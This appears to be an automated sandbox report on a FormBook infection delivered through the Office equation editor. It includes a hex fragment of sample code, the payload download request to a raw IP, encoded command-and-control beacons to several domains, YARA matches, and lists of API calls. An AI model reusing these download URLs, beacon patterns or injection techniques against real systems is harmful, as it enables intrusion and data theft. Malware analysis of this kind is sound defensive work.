00 00 00 ac 8f 10 00 00 00 00 00 48 00 00 00 02 00 05 00 4c a3 04 00 64 38 04 00 03 00 00 00 4d 08 00 06 b0 db 08 00 c8 b3 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00

Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=L/l9chWXgd4NYCGd+vVro19pFM6JqqsPd4ppl3EKhtG9qh305X+esnK5qs3e0XUjSiRqvg==&bzr8U=6lxL-0XX HTTP/1.1Host: www.iotcloud.technologyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX HTTP/1.1Host: www.micheldrake.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&bzr8U=6lxL-0XX HTTP/1.1Host: www.ruhexuangou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX HTTP/1.1Host: www.adultpeace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 192.0.78.25 192.0.78.25

Source: Joe Sandbox View	ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View	ASN Name: LEASEWEB-USA-SFO-12US LEASEWEB-USA-SFO-12US

Source: global traffic

HTTP traffic detected: GET /www/dun.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.229.216.142Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.229.216.142

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC7AE3BD.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /www/dun.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.229.216.142Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=L/l9chWXgd4NYCGd+vVro19pFM6JqqsPd4ppl3EKhtG9qh305X+esnK5qs3e0XUjSiRqvg==&bzr8U=6lxL-0XX HTTP/1.1Host: www.iotcloud.technologyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX HTTP/1.1Host: www.micheldrake.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&bzr8U=6lxL-0XX HTTP/1.1Host: www.ruhexuangou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX HTTP/1.1Host: www.adultpeace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.cleanxcare.com

Source: explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000008.00000000.2161066027.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.2171247047.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000008.00000000.2161066027.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2166928921.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2178764759.000000000861C000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2167152019.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\Public\vbc.exe	Code function: 7_2_004181B0 NtCreateFile,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00418260 NtReadFile,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_004182E0 NtClose,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00418390 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_004182AC NtReadFile,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041838B NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C00C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C0048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C0078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C07AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BF9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BF900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C10D0 NtOpenProcessToken,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C0060 NtQuerySection,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C01D4 NtSetValueKey,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C010C NtOpenDirectoryObject,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C1148 NtOpenThread,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BF8CC NtWaitForSingleObject,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BF938 NtWriteFile,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C1930 NtSetContextThread,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFAB8 NtQueryValueKey,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFA20 NtQueryInformationFile,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFA50 NtEnumerateValueKey,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFBE8 NtQueryVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFB50 NtCreateKey,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFC30 NtOpenProcess,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFC48 NtSetInformationFile,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C0C40 NtGetContextThread,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008C1D80 NtSuspendThread,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFD5C NtEnumerateKey,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFE24 NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFFFC NtCreateProcessEx,
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008BFF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020400C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020407AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FB50 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203F900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203F9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02040048 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02040060 NtQuerySection,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02040078 NtResumeThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020410D0 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0204010C NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02041148 NtOpenThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020401D4 NtSetValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FA20 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FA50 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FAB8 NtQueryValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FAD0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203F8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02041930 NtSetContextThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203F938 NtWriteFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FEA0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02040C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FC48 NtSetInformationFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0203FD5C NtEnumerateKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02041D80 NtSuspendThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_002081B0 NtCreateFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_00208260 NtReadFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_002082E0 NtClose,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_002082AC NtReadFile,

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137B673
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004082E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405865
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00403490
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004058A8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401151
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401502
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401508
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401990
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004019A0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405260
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405270
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00403E20
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004042D7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00407F00
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040170C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401710
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00400322
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00400330
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405FFF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401BA8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401BB8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04F0E420
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04F0C641
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04EF0048
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04F0D210
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04F0DD58
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04F0DA72
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04EF0006
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04F0D1F6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137B6C0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B8B1
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B963
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00408C4B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00408C50
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B493
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B496
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041C539
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402D89
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041CE85
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041BF12
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041C795
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137B673
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008CE0C6
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008FD005
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008D3040
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008E905A
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008CE2E9
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00971238
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008CF3CF
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008F63DB
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008D2305
